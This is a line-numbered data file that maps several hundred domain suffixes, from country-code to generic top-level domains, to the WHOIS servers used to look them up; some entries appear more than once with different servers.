| me:whois.nic.me, 34 | at:whois.nic.at, 35 | be:whois.dns.be, 36 | cn:whois.cnnic.cn, 37 | edu.cn:whois.edu.cn, 38 | asia:whois.nic.asia, 39 | ru:whois.ripn.ru, 40 | ro:whois.rotld.ro, 41 | aero:whois.aero, 42 | fr:whois.nic.fr, 43 | se:whois.iis.se, 44 | nl:whois.sidn.nl, 45 | nz:whois.srs.net.nz, 46 | mx:whois.nic.mx, 47 | tw:whois.apnic.net, 48 | ch:whois.nic.ch, 49 | hk:whois.hknic.net.hk, 50 | ac:whois.nic.ac, 51 | ae:whois.nic.ae, 52 | af:whois.nic.af, 53 | ag:whois.nic.ag, 54 | al:whois.ripe.net, 55 | am:whois.amnic.net, 56 | as:whois.nic.as, 57 | az:whois.ripe.net, 58 | ba:whois.ripe.net, 59 | bg:whois.register.bg, 60 | bi:whois.nic.bi, 61 | bj:www.nic.bj, 62 | br:whois.nic.br, 63 | br.com:whois.centralnic.net, 64 | eu.org:whois.eu.org, 65 | bt:whois.netnames.net, 66 | by:whois.ripe.net, 67 | bz:whois.belizenic.bz, 68 | cd:whois.nic.cd, 69 | ck:whois.nic.ck, 70 | cl:nic.cl, 71 | coop:whois.nic.coop, 72 | cx:whois.nic.cx, 73 | cy:whois.ripe.net, 74 | cz:whois.nic.cz, 75 | host:whois.nic.host, 76 | dk:whois.dk-hostmaster.dk, 77 | dm:whois.nic.cx, 78 | dz:whois.ripe.net, 79 | ee:whois.eenet.ee, 80 | eg:whois.ripe.net, 81 | es:whois.ripe.net, 82 | fi:whois.ficora.fi, 83 | fo:whois.ripe.net, 84 | gb:whois.ripe.net, 85 | ge:whois.ripe.net, 86 | gl:whois.ripe.net, 87 | gm:whois.ripe.net, 88 | gov:whois.nic.gov, 89 | gr:whois.ripe.net, 90 | gs:whois.adamsnames.tc, 91 | hm:whois.registry.hm, 92 | hn:whois2.afilias-grs.net, 93 | hr:whois.ripe.net, 94 | hu:whois.ripe.net, 95 | il:whois.isoc.org.il, 96 | int:whois.isi.edu, 97 | iq:vrx.net, 98 | ir:whois.nic.ir, 99 | is:whois.isnic.is, 100 | je:whois.je, 101 | jp:whois.jprs.jp, 102 | kg:whois.domain.kg, 103 | market:whois.rightside.co, 104 | ltd:whois.donuts.co, 105 | design:whois.nic.design, 106 | wiki:whois.nic.wiki, 107 | science:whois.nic.science, 108 | software:whois.rightside.co, 109 | social:whois.unitedtld.com, 110 | online:whois.nic.online, 111 | kr:whois.nic.or.kr, 112 | la:whois2.afilias-grs.net, 113 | 
lt:whois.domreg.lt, 114 | lu:whois.restena.lu, 115 | lv:whois.nic.lv, 116 | ly:whois.lydomains.com, 117 | ma:whois.iam.net.ma, 118 | mc:whois.ripe.net, 119 | md:whois.nic.md, 120 | mil:whois.nic.mil, 121 | mk:whois.ripe.net, 122 | ms:whois.nic.ms, 123 | mt:whois.ripe.net, 124 | mu:whois.nic.mu, 125 | my:whois.mynic.net.my, 126 | nf:whois.nic.cx, 127 | pl:whois.dns.pl, 128 | pr:whois.nic.pr, 129 | pt:whois.dns.pt, 130 | sa:saudinic.net.sa, 131 | sb:whois.nic.net.sb, 132 | sg:whois.nic.net.sg, 133 | sh:whois.nic.sh, 134 | si:whois.arnes.si, 135 | sk:whois.sk-nic.sk, 136 | sm:whois.ripe.net, 137 | st:whois.nic.st, 138 | su:whois.ripn.net, 139 | tc:whois.adamsnames.tc, 140 | tf:whois.nic.tf, 141 | th:whois.thnic.net, 142 | tj:whois.nic.tj, 143 | tk:whois.dot.tk, 144 | tl:whois.domains.tl, 145 | tm:whois.nic.tm, 146 | tn:whois.ripe.net, 147 | to:whois.tonic.to, 148 | tp:whois.domains.tl, 149 | tr:whois.nic.tr, 150 | ua:whois.ripe.net, 151 | uy:nic.uy, 152 | uz:whois.cctld.uz, 153 | va:whois.ripe.net, 154 | vc:whois2.afilias-grs.net, 155 | ve:whois.nic.ve, 156 | vg:whois.adamsnames.tc, 157 | yu:whois.ripe.net, 158 | ng:whois.nic.net.ng 159 | limited:whois.donuts.co 160 | med.ht:whois.nic.ht 161 | idv.tw:whois.twnic.net.tw 162 | nsw.au:whois.aunic.net 163 | isa.us:whois.nic.us 164 | paris:whois-paris.nic.fr 165 | org.lv:whois.nic.lv 166 | art.ht:whois.nic.ht 167 | sshn.se:whois.nic-se.se 168 | sch.ae:whois.aeda.net.ae 169 | tickets:whois.donuts.co 170 | info.ht:whois.nic.ht 171 | imb.br:whois.nic.br 172 | soros.al:whois.ripe.net 173 | direct:whois.comlaude.com 174 | tires:whois.donuts.co 175 | mil.se:whois.nic-se.se 176 | esp.br:whois.nic.br 177 | pro.ae:whois.aeda.net.ae 178 | asia:whois.nic.asia 179 | 000.nl:whois.domain-registry.nl 180 | supplies:whois.donuts.co 181 | net:whois.iana.org 182 | mod.uk:whois.nic.uk 183 | net.ru:whois.tcinet.ru 184 | tm.ro:whois.rotld.ro 185 | studio:whois.donuts.co 186 | iz.hr:whois.dns.hr 187 | forum:whois.donuts.co 188 | 
auction:whois.donuts.co 189 | wy.us:whois.nic.us 190 | nom.fr:whois.nic.fr 191 | credit:whois.donuts.co 192 | sch.sa:saudinic.net.sa 193 | mil.ac:whois.nic.ac 194 | mil.ae:whois.aeda.net.ae 195 | gob.hn:whois2.afilias-grs.net 196 | net.ng:whois.nic.net.ng 197 | fot.br:whois.nic.br 198 | org.ma:whois.iam.net.ma 199 | net.nz:whois.srs.net.nz 200 | net.li:whois.nic.li 201 | hospital:whois.donuts.co 202 | pro.om:whois.registry.om 203 | fed.us:whois.nic.us 204 | glass:whois.donuts.co 205 | berlin:whois.nic.berlin 206 | net.ec:whois.nic.ec 207 | me:whois.nic.me 208 | md:whois.nic.md 209 | mg:whois.nic.mg 210 | ma:whois.iam.net.ma 211 | ml:whois.dot.ml 212 | mo:whois.monic.mo 213 | mk:whois.ripe.net 214 | mt:whois.ripe.net 215 | ms:whois.nic.ms 216 | in.th:whois.thnic.net 217 | mx:whois.nic.mx 218 | mz:whois.nic.mz 219 | wang:whois.nic.wang 220 | estate:whois.name.com 221 | odo.br:whois.nic.br 222 | dpn.br:whois.nic.br 223 | net.lv:whois.nic.lv 224 | org.se:whois.nic-se.se 225 | org.co:whois.nic.co 226 | org.cn:whois.cnnic.net.cn 227 | org.ch:whois.nic.ch 228 | bj.cn:whois.cnnic.net.cn 229 | travel:whois.nic.travel 230 | org.cd:whois.nic.cd 231 | ct.us:whois.nic.us 232 | hot:whois.donuts.co 233 | org.cy:whois.ripe.net 234 | boats:whois.donuts.co 235 | poker:whois.donuts.co 236 | beauty:whois.donuts.co 237 | law:whois.donuts.co 238 | go.ug:whois.co.ug 239 | me.uk:whois.nic.uk 240 | biz.cy:whois.ripe.net 241 | co.bw:whois.nic.net.bw 242 | bel.tr:whois.nic.tr 243 | reklam.hu:whois.nic.hu 244 | suli.hu:whois.nic.hu 245 | kommune.no:whois.norid.no 246 | info.cy:whois.ripe.net 247 | nhs.uk:whois.nic.uk 248 | realestate:whois.donuts.co 249 | fashion:whois.donuts.co 250 | lakas.hu:whois.nic.hu 251 | co.cc:whois.nic.cc 252 | gouv.fr:whois.nic.fr 253 | ca.us:whois.nic.us 254 | luxury:whois.donuts.co 255 | k12.il:whois.isoc.org.il 256 | net.ma:whois.iam.net.ma 257 | org.ru:whois.tcinet.ru 258 | net.mo:whois.monic.mo 259 | sd.cn:whois.cnnic.net.cn 260 | net.mt:whois.ripe.net 261 | 
net.mx:whois.nic.mx 262 | org.ro:whois.rotld.ro 263 | camp:whois.donuts.co 264 | tech:whois.donuts.co 265 | radio:whois.donuts.co 266 | solutions:whois.comlaude.com 267 | edu.mt:whois.ripe.net 268 | edu.mx:whois.nic.mx 269 | edu.mg:whois.nic.mg 270 | com.pl:whois.dns.pl 271 | com.mu:whois.nic.mu 272 | edu.mo:whois.monic.mo 273 | com.pf:whois.registry.pf 274 | dm:whois.nic.cx 275 | dk:whois.dk-hostmaster.dk 276 | watch:whois.uniregistrar.com 277 | rec.br:whois.nic.br 278 | dz:whois.nic.dz 279 | museum.no:whois.norid.no 280 | wedding:whois.donuts.co 281 | report:whois.donuts.co 282 | org.dm:whois.nic.cx 283 | org.dz:whois.nic.dz 284 | coop.ht:whois.nic.ht 285 | go.id:whois.pandi.or.id 286 | best:whois.nic.best 287 | voyage:whois.donuts.co 288 | vt.us:whois.nic.us 289 | name.cy:whois.ripe.net 290 | wf:whois.nic.wf 291 | bargains:whois.comlaude.com 292 | cri.nz:whois.srs.net.nz 293 | ws:whois.website.ws 294 | wtf:whois.1api.net 295 | news:whois.donuts.co 296 | kitchen:whois.name.com 297 | mi.th:whois.thnic.net 298 | com.mo:whois.monic.mo 299 | ne.tz:whois.tznic.or.tz 300 | games:whois.donuts.co 301 | com:whois.iana.org 302 | tozsde.hu:whois.nic.hu 303 | org.ee:whois.tld.ee 304 | firm.ht:whois.nic.ht 305 | bingo:whois.donuts.co 306 | g12.br:whois.nic.br 307 | pp.ru:whois.tcinet.ru 308 | website:whois.donuts.co 309 | gov.tw:whois.twnic.net.tw 310 | gov.tr:whois.nic.tr 311 | net.pr:whois.nic.pr 312 | forum.hu:whois.nic.hu 313 | mil.co:whois.nic.co 314 | mil.az:whois.ripe.net 315 | net.pl:whois.dns.pl 316 | gov.tn:whois.ati.tn 317 | gov.to:whois.tonic.to 318 | com.au:whois.aunic.net 319 | adv.br:whois.nic.br 320 | az.us:whois.nic.us 321 | property:whois.donuts.co 322 | iq:whois.cmc.iq 323 | is:whois.isnic.is 324 | ir:whois.nic.ir 325 | it:whois.nic.it 326 | priv.no:whois.norid.no 327 | im:whois.nic.im 328 | il:whois.isoc.org.il 329 | in:whois.inregistry.net 330 | org.sg:whois.nic.net.sg 331 | net.lu:whois.restena.lu 332 | ie:whois.domainregistry.ie 333 | 
id:whois.pandi.or.id 334 | org.sa:saudinic.net.sa 335 | memorial:whois.donuts.co 336 | nic.in:whois.inregistry.net 337 | ebiz.tw:whois.twnic.net.tw 338 | naturbruksgymn.se:whois.nic-se.se 339 | sh.cn:whois.cnnic.net.cn 340 | ac.be:whois.dns.be 341 | ingatlan.hu:whois.nic.hu 342 | hi.us:whois.nic.us 343 | co.yu:whois.ripe.net 344 | web.tr:whois.nic.tr 345 | gen.in:whois.inregistry.net 346 | claims:whois.donuts.co 347 | investments:whois.donuts.co 348 | juegos:whois.donuts.co 349 | nm.cn:whois.cnnic.net.cn 350 | museum.om:whois.registry.om 351 | com.al:whois.ripe.net 352 | ny.us:whois.nic.us 353 | com.ai:whois.ai 354 | com.af:whois.nic.af 355 | com.ag:whois.nic.ag 356 | org.ec:whois.nic.ec 357 | com.ac:whois.nic.ac 358 | org.eg:whois.ripe.net 359 | com.tn:whois.ati.tn 360 | com.aw:whois.nic.aw 361 | org.es:whois.nic.es 362 | vin:whois.donuts.co 363 | edu.tw:whois.twnic.net.tw 364 | ppg.br:whois.nic.br 365 | or.at:whois.nic.at 366 | 999.nl:whois.domain-registry.nl 367 | oz.au:whois.aunic.net 368 | security:whois.donuts.co 369 | ah.cn:whois.cnnic.net.cn 370 | attorney:whois.donuts.co 371 | productions:whois.comlaude.com 372 | gov.eg:whois.ripe.net 373 | or.kr:whois.kr 374 | energy:whois.donuts.co 375 | marketing:whois.donuts.co 376 | name.tr:whois.nic.tr 377 | discount:whois.comlaude.com 378 | properties:whois.donuts.co 379 | vatican.va:whois.ripe.net 380 | upt.al:whois.ripe.net 381 | com.ng:whois.nic.net.ng 382 | ma.us:whois.nic.us 383 | plus:whois.goaustraliadomains.com 384 | com.sa:saudinic.net.sa 385 | com.sb:whois.nic.net.sb 386 | com.sc:whois2.afilias-grs.net 387 | com.sg:whois.nic.net.sg 388 | consulting:whois.donuts.co 389 | mba:Whois.gocanadadomains.com 390 | 2000.hu:whois.nic.hu 391 | gov.ua:whois.ua 392 | mil.lt:whois.domreg.lt 393 | mil.lu:whois.restena.lu 394 | biz.az:whois.ripe.net 395 | viajes:whois.donuts.co 396 | support:whois.comlaude.com 397 | tennis:whois.donuts.co 398 | ngo.pl:whois.dns.pl 399 | city.hu:whois.nic.hu 400 | asn.au:whois.aunic.net 401 
| msk.ru:whois.tcinet.ru 402 | solar:whois.epik.com 403 | co.in:whois.inregistry.net 404 | gov.gr:whois.ripe.net 405 | gov.gi:whois2.afilias-grs.net 406 | tel.tr:whois.nic.tr 407 | gov.ge:whois.ripe.net 408 | ac.cy:whois.ripe.net 409 | sale:whois.donuts.co 410 | ac.cn:whois.cnnic.net.cn 411 | pp.az:whois.ripe.net 412 | pub.sa:saudinic.net.sa 413 | nl:whois.domain-registry.nl 414 | no:whois.norid.no 415 | na:whois.na-nic.com.na 416 | nc:whois.nc 417 | nf:whois.nic.nf 418 | ng:whois.nic.net.ng 419 | nz:whois.srs.net.nz 420 | nu:whois.nic.nu 421 | ky.us:whois.nic.us 422 | firm.in:whois.inregistry.net 423 | football:whois.donuts.co 424 | diet:whois.donuts.co 425 | muni.il:whois.isoc.org.il 426 | press.se:whois.nic-se.se 427 | phone:whois.donuts.co 428 | ind.br:whois.nic.br 429 | pp.se:whois.nic-se.se 430 | news.hu:whois.nic.hu 431 | coach:whois.donuts.co 432 | global:whois.donuts.co 433 | vet:whois.donuts.co 434 | iwi.nz:whois.srs.net.nz 435 | co.ma:whois.iam.net.ma 436 | nh.us:whois.nic.us 437 | mat.br:whois.nic.br 438 | gouv.ht:whois.nic.ht 439 | co.mu:whois.nic.mu 440 | geek.nz:whois.srs.net.nz 441 | org.tr:whois.nic.tr 442 | gen.tr:whois.nic.tr 443 | org.tw:whois.twnic.net.tw 444 | net.kz:whois.nic.kz 445 | org.tn:whois.ati.tn 446 | mc:whois.ripe.net 447 | mi.us:whois.nic.us 448 | il.us:whois.nic.us 449 | com.ro:whois.rotld.ro 450 | or.jp:whois.jprs.jp 451 | qh.cn:whois.cnnic.net.cn 452 | com.ru:whois.tcinet.ru 453 | hl.cn:whois.cnnic.net.cn 454 | med.pro:whois.registrypro.pro 455 | co.jp:whois.jprs.jp 456 | edu.ky:whois.kyregistry.ky 457 | uniti.al:whois.ripe.net 458 | tv.br:whois.nic.br 459 | lanarb.se:whois.nic-se.se 460 | nx.cn:whois.cnnic.net.cn 461 | baseball:whois.donuts.co 462 | tv.bo:whois.nic.bo 463 | institute:whois.comlaude.com 464 | nj.us:whois.nic.us 465 | domains:whois.comlaude.com 466 | love:whois.donuts.co 467 | gob.mx:whois.nic.mx 468 | gov.dm:whois.nic.cx 469 | edu.cn:whois.cnnic.net.cn 470 | market:whois.donuts.co 471 | biz.om:whois.registry.om 
472 | idn.sg:whois.nic.net.sg 473 | name.az:whois.ripe.net 474 | name.ae:whois.aeda.net.ae 475 | lg.jp:whois.jprs.jp 476 | live:whois.donuts.co 477 | org.gr:whois.ripe.net 478 | today:whois.donuts.co 479 | club:whois.101domain.com 480 | ooo:whois.nic.ooo 481 | gv.at:whois.nic.at 482 | realty:whois.donuts.co 483 | cat:whois.cat 484 | reviews:whois.donuts.co 485 | idrett.no:whois.norid.no 486 | net.tw:whois.twnic.net.tw 487 | eng.br:whois.nic.br 488 | ac.ru:whois.tcinet.ru 489 | clothing:whois.comlaude.com 490 | nd.us:whois.nic.us 491 | info.ve:whois.nic.ve 492 | ne.jp:whois.jprs.jp 493 | mil.mg:whois.nic.mg 494 | ok.us:whois.nic.us 495 | data:whois.donuts.co 496 | sx:whois.sx 497 | su:whois.tcinet.ru 498 | st:whois.nic.st 499 | sk:whois.sk-nic.sk 500 | si:whois.arnes.si 501 | so:whois.nic.so 502 | sm:whois.nic.sm 503 | sc:whois2.afilias-grs.net 504 | sb:whois.nic.net.sb 505 | sa:saudinic.net.sa 506 | sg:whois.nic.net.sg 507 | se:whois.nic-se.se 508 | org.uy:nic.uy 509 | shoes:whois.comlaude.com 510 | net.je:whois.je 511 | priv.hu:whois.nic.hu 512 | gov.uk:whois.ja.net 513 | org.uk:whois.nic.uk 514 | net.tn:whois.ati.tn 515 | org.ua:whois.ua 516 | wv.us:whois.nic.us 517 | fnd.br:whois.nic.br 518 | xyz:whois.nic.xyz 519 | js.cn:whois.cnnic.net.cn 520 | finance:whois.comlaude.com 521 | name:whois.nic.name 522 | art.pl:whois.dns.pl 523 | per.sg:whois.nic.net.sg 524 | ee:whois.tld.ee 525 | eg:whois.ripe.net 526 | ac.th:whois.thnic.net 527 | ec:whois.nic.ec 528 | eu:whois.eu 529 | es:whois.nic.es 530 | com.ch:whois.nic.ch 531 | living:whois.donuts.co 532 | com.cn:whois.cnnic.net.cn 533 | com.cd:whois.nic.cd 534 | com.cy:whois.ripe.net 535 | info.ro:whois.rotld.ro 536 | org.gg:whois.gg 537 | org.ge:whois.ripe.net 538 | org.gi:whois2.afilias-grs.net 539 | cars:whois.donuts.co 540 | school.nz:whois.srs.net.nz 541 | org:whois.pir.org 542 | care:whois.eurodns.com 543 | ks.us:whois.nic.us 544 | training:whois.comlaude.com 545 | co.nz:whois.srs.net.nz 546 | 
kommunalforbund.se:whois.nic-se.se 547 | place:whois.donuts.co 548 | forsale:whois.donuts.co 549 | nic.im:whois.nic.im 550 | gx.cn:whois.cnnic.net.cn 551 | ong:whois.publicinterestregistry.net 552 | vote:whois.donuts.co 553 | city:whois.eurodns.com 554 | hb.cn:whois.cnnic.net.cn 555 | cng.br:whois.nic.br 556 | com.ua:whois.ua 557 | flowers:whois.donuts.co 558 | edu.ht:whois.nic.ht 559 | edu.hn:whois2.afilias-grs.net 560 | edu.hk:whois.hknic.net.hk 561 | cards:whois.donuts.co 562 | org.sc:whois2.afilias-grs.net 563 | com.dz:whois.nic.dz 564 | mil.no:whois.norid.no 565 | pro:whois.registrypro.pro 566 | mil.nz:whois.srs.net.nz 567 | rent:whois.donuts.co 568 | far.br:whois.nic.br 569 | edu.tr:whois.nic.tr 570 | online:whois.donuts.co 571 | govt.nz:whois.srs.net.nz 572 | org.ve:whois.nic.ve 573 | edu.co:whois.nic.co 574 | gz.cn:whois.cnnic.net.cn 575 | nel.uk:whois.nic.uk 576 | ut.us:whois.nic.us 577 | fhsk.se:whois.nic-se.se 578 | tj.cn:whois.cnnic.net.cn 579 | shop:whois.donuts.co 580 | show:whois.name.com 581 | cheap:whois.comlaude.com 582 | info.ec:whois.nic.ec 583 | szex.hu:whois.nic.hu 584 | hockey:whois.donuts.co 585 | co.hu:whois.nic.hu 586 | konyvelo.hu:whois.nic.hu 587 | nom.mg:whois.nic.mg 588 | wiki:whois.nic.wiki 589 | int.az:whois.ripe.net 590 | college:whois.donuts.co 591 | surgery:whois.donuts.co 592 | gov.ch:whois.nic.ch 593 | mortgage:whois.donuts.co 594 | id.us:whois.nic.us 595 | diamonds:whois.namecheap.com 596 | co.om:whois.registry.om 597 | srv.br:whois.nic.br 598 | herad.no:whois.norid.no 599 | net.ir:whois.nic.ir 600 | jp:whois.jprs.jp 601 | net.id:whois.pandi.or.id 602 | net.il:whois.isoc.org.il 603 | je:whois.je 604 | net.in:whois.inregistry.net 605 | med.br:whois.nic.br 606 | coupons:whois.comlaude.com 607 | ac.ae:whois.aeda.net.ae 608 | rugby:whois.donuts.co 609 | ac.at:whois.nic.at 610 | ens.tn:whois.ati.tn 611 | asso.mc:whois.ripe.net 612 | com.tw:whois.twnic.net.tw 613 | net.im:whois.nic.im 614 | edu.in:whois.inregistry.net 615 | 
shopping:whois.donuts.co 616 | aero:whois.aero 617 | casa:whois.donuts.co 618 | com.br:whois.nic.br 619 | org.ht:whois.nic.ht 620 | org.hu:whois.nic.hu 621 | org.hn:whois2.afilias-grs.net 622 | com.bo:whois.nic.bo 623 | nt.ro:whois.rotld.ro 624 | national-library-scotland.uk:whois.nic.uk 625 | doctor:whois.uniregistrar.com 626 | food:whois.donuts.co 627 | net.br:whois.nic.br 628 | jogasz.hu:whois.nic.hu 629 | sch.om:whois.registry.om 630 | events:whois.comlaude.com 631 | dc.us:whois.nic.us 632 | edu.gr:whois.ripe.net 633 | edu.es:whois.nic.es 634 | edu.ge:whois.ripe.net 635 | bbs.tr:whois.nic.tr 636 | la.us:whois.nic.us 637 | edu.gi:whois2.afilias-grs.net 638 | csiro.au:whois.aunic.net 639 | theater:whois.comlaude.com 640 | tm.mc:whois.ripe.net 641 | tm.mg:whois.nic.mg 642 | www.ro:whois.rotld.ro 643 | bmd.br:whois.nic.br 644 | blog:whois.donuts.co 645 | careers:whois.comlaude.com 646 | info.tn:whois.ati.tn 647 | lanbib.se:whois.nic-se.se 648 | edu.ua:whois.ua 649 | edu.uy:nic.uy 650 | gub.uy:nic.uy 651 | ga.us:whois.nic.us 652 | al.us:whois.nic.us 653 | tur.br:whois.nic.br 654 | apartments:whois.donuts.co 655 | co.uk:whois.nic.uk 656 | hotel.hu:whois.nic.hu 657 | mo.us:whois.nic.us 658 | net.hk:whois.hknic.net.hk 659 | hn.cn:whois.cnnic.net.cn 660 | tube:whois.donuts.co 661 | legal:whois.donuts.co 662 | nom.pe:kero.yachay.pe 663 | org.ae:whois.aeda.net.ae 664 | business:whois.donuts.co 665 | broker:whois.donuts.co 666 | om:whois.registry.om 667 | org.ac:whois.nic.ac 668 | inf.br:whois.nic.br 669 | com.es:whois.nic.es 670 | org.im:whois.nic.im 671 | com.ec:whois.nic.ec 672 | org.in:whois.inregistry.net 673 | com.ee:whois.tld.ee 674 | fish:whois.uniregistrar.com 675 | com.uy:nic.uy 676 | av.tr:whois.nic.tr 677 | eti.br:whois.nic.br 678 | fylkesbibl.no:whois.norid.no 679 | org.az:whois.ripe.net 680 | builders:whois.donuts.co 681 | video.hu:whois.nic.hu 682 | ac:whois.nic.ac 683 | ae:whois.aeda.net.ae 684 | ad:whois.ripe.net 685 | ag:whois.nic.ag 686 | af:whois.nic.af 
687 | ai:whois.ai 688 | edu.dz:whois.nic.dz 689 | am:whois.amnic.net 690 | al:whois.ripe.net 691 | as:whois.nic.as 692 | au:whois.aunic.net 693 | at:whois.nic.at 694 | aw:whois.nic.aw 695 | ax:whois.ax 696 | az:whois.ripe.net 697 | edu.dm:whois.nic.cx 698 | music.mobi:whois.dotmobiregistry.net 699 | co.th:whois.thnic.net 700 | creditcard:whois.donuts.co 701 | name.pr:whois.nic.pr 702 | co.tz:whois.tznic.or.tz 703 | gifts:whois.comlaude.com 704 | nom.br:whois.nic.br 705 | ekloges.cy:whois.ripe.net 706 | photos:whois.donuts.co 707 | directory:whois.comlaude.com 708 | hamburg:whois.nic.hamburg 709 | tours:whois.donuts.co 710 | mil.pe:kero.yachay.pe 711 | mil.hn:whois2.afilias-grs.net 712 | game.tw:whois.twnic.net.tw 713 | tz:whois.tznic.or.tz 714 | org.mg:whois.nic.mg 715 | immo:whois.donuts.co 716 | tv:whois.enom.com 717 | tw:whois.twnic.net.tw 718 | tr:whois.nic.tr 719 | med.om:whois.registry.om 720 | tn:whois.ati.tn 721 | to:whois.tonic.to 722 | tm:whois.nic.tm 723 | th:whois.thnic.net 724 | tf:whois.nic.tf 725 | health:whois.donuts.co 726 | cnt.br:whois.nic.br 727 | tienda:whois.donuts.co 728 | dr.tr:whois.nic.tr 729 | fan:whois.donuts.co 730 | org.mo:whois.monic.mo 731 | gov.kz:whois.nic.kz 732 | ed.jp:whois.jprs.jp 733 | ro:whois.rotld.ro 734 | biz.pr:whois.nic.pr 735 | biz.pl:whois.dns.pl 736 | org.mt:whois.ripe.net 737 | tel:whois.nic.tel 738 | com.bz:whois.belizenic.bz 739 | design:whois.donuts.co 740 | lawyer:whois.donuts.co 741 | org.mx:whois.nic.mx 742 | prd.fr:whois.nic.fr 743 | lel.br:whois.nic.br 744 | racing:whois.donuts.co 745 | sc.cn:whois.cnnic.net.cn 746 | jet.uk:whois.nic.uk 747 | jor.br:whois.nic.br 748 | com.co:whois.nic.co 749 | va.us:whois.nic.us 750 | cpa.pro:whois.registrypro.pro 751 | family:whois.donuts.co 752 | vip:whois.donuts.co 753 | toys:whois.comlaude.com 754 | co.ir:whois.nic.ir 755 | co.id:whois.pandi.or.id 756 | co.il:whois.isoc.org.il 757 | co.im:whois.nic.im 758 | casino.hu:whois.nic.hu 759 | net.gr:whois.ripe.net 760 | 
mil.tw:whois.twnic.net.tw 761 | mil.tr:whois.nic.tr 762 | md.us:whois.nic.us 763 | pro.ht:whois.nic.ht 764 | net.gg:whois.gg 765 | net.ge:whois.ripe.net 766 | town:whois.donuts.co 767 | sucks:whois.donuts.co 768 | me.us:whois.nic.us 769 | rec.ro:whois.rotld.ro 770 | etc.br:whois.nic.br 771 | com.ve:whois.nic.ve 772 | gov.al:whois.ripe.net 773 | am.br:whois.nic.br 774 | fr:whois.nic.fr 775 | fi:whois.fi 776 | fo:whois.nic.fo 777 | icnet.uk:whois.nic.uk 778 | net.af:whois.nic.af 779 | he.cn:whois.cnnic.net.cn 780 | net.ky:whois.kyregistry.ky 781 | media:whois.comlaude.com 782 | com.dm:whois.nic.cx 783 | org.je:whois.je 784 | tourism.tn:whois.ati.tn 785 | gov.hk:whois.hknic.net.hk 786 | help:whois.donuts.co 787 | psi.br:whois.nic.br 788 | asn.lv:whois.nic.lv 789 | broadway:whois.donuts.co 790 | style:whois.donuts.co 791 | sch.ir:whois.nic.ir 792 | yn.cn:whois.cnnic.net.cn 793 | soccer:whois.donuts.co 794 | ceo:whois.nic.ceo 795 | co.je:whois.je 796 | edu.eg:whois.ripe.net 797 | edu.ec:whois.nic.ec 798 | co.ug:whois.co.ug 799 | co.us:whois.nic.us 800 | net.ac:whois.nic.ac 801 | firm.ro:whois.rotld.ro 802 | perso.ht:whois.nic.ht 803 | insurance:whois.donuts.co 804 | dni.us:whois.nic.us 805 | adult.ht:whois.nic.ht 806 | nsn.us:whois.nic.us 807 | mod.gi:whois2.afilias-grs.net 808 | art.br:whois.nic.br 809 | pub:whois.unitedtld.com 810 | mil.in:whois.inregistry.net 811 | ecn.br:whois.nic.br 812 | edu.sa:saudinic.net.sa 813 | edu.sc:whois2.afilias-grs.net 814 | edu.sb:whois.nic.net.sb 815 | edu.sg:whois.nic.net.sg 816 | gov.mo:whois.monic.mo 817 | mil.uk:whois.nic.uk 818 | qld.au:whois.aunic.net 819 | florist:whois.101domain.com 820 | mil.uy:nic.uy 821 | nom.ro:whois.rotld.ro 822 | store:whois.donuts.co 823 | lease:whois.epik.com 824 | idv.hk:whois.hknic.net.hk 825 | wa.us:whois.nic.us 826 | dentist:whois.donuts.co 827 | ln.cn:whois.cnnic.net.cn 828 | film.hu:whois.nic.hu 829 | zlg.br:whois.nic.br 830 | qsl.br:whois.nic.br 831 | kids.us:whois.nic.us 832 | 
com.gr:whois.ripe.net 833 | maison:whois.donuts.co 834 | com.ge:whois.ripe.net 835 | pol.tr:whois.nic.tr 836 | rel.ht:whois.nic.ht 837 | singles:whois.donuts.co 838 | ac.jp:whois.jprs.jp 839 | services:whois.comlaude.com 840 | kg:whois.domain.kg 841 | ke:whois.kenic.or.ke 842 | mobile:whois.donuts.co 843 | ki:whois.nic.ki 844 | futbol:whois.donuts.co 845 | kr:whois.kr 846 | org.yu:whois.ripe.net 847 | kz:whois.nic.kz 848 | ky:whois.kyregistry.ky 849 | bzh:whois-bzh.nic.fr 850 | ato.br:whois.nic.br 851 | edu.kz:whois.nic.kz 852 | cruises:whois.donuts.co 853 | edu.br:whois.nic.br 854 | edu.bo:whois.nic.bo 855 | conf.lv:whois.nic.lv 856 | co.ve:whois.nic.ve 857 | condos:whois.donuts.co 858 | plc.uk:whois.nic.uk 859 | flights:whois.donuts.co 860 | asso.ht:whois.nic.ht 861 | club.tw:whois.twnic.net.tw 862 | gov.ky:whois.kyregistry.ky 863 | res.in:whois.inregistry.net 864 | weather.mobi:whois.dotmobiregistry.net 865 | net.sg:whois.nic.net.sg 866 | act.au:whois.aunic.net 867 | parti.se:whois.nic-se.se 868 | psc.br:whois.nic.br 869 | expert:whois.udag.net 870 | movie:Whois.gomontenegrodomains.com 871 | edu.pe:kero.yachay.pe 872 | edu.pl:whois.dns.pl 873 | ltd.gi:whois2.afilias-grs.net 874 | gov.it:whois.nic.it 875 | gov.ir:whois.nic.ir 876 | komvux.se:whois.nic-se.se 877 | gov.ie:whois.domainregistry.ie 878 | info.tr:whois.nic.tr 879 | gov.in:whois.inregistry.net 880 | gov.im:whois.nic.im 881 | gov.il:whois.isoc.org.il 882 | pol.dz:whois.nic.dz 883 | slg.br:whois.nic.br 884 | co.ag:whois.nic.ag 885 | restaurant:whois.comlaude.com 886 | supply:whois.donuts.co 887 | info.az:whois.ripe.net 888 | tm.se:whois.nic-se.se 889 | sd.us:whois.nic.us 890 | church:whois.donuts.co 891 | parliament.uk:whois.nic.uk 892 | nat.tn:whois.ati.tn 893 | pr:whois.nic.pr 894 | pw:whois.hkdns.hk 895 | nom.ad:whois.ripe.net 896 | nom.ag:whois.nic.ag 897 | pf:whois.registry.pf 898 | ltd.uk:whois.nic.uk 899 | med.sa:saudinic.net.sa 900 | pvt.ge:whois.ripe.net 901 | fhv.se:whois.nic-se.se 902 | 
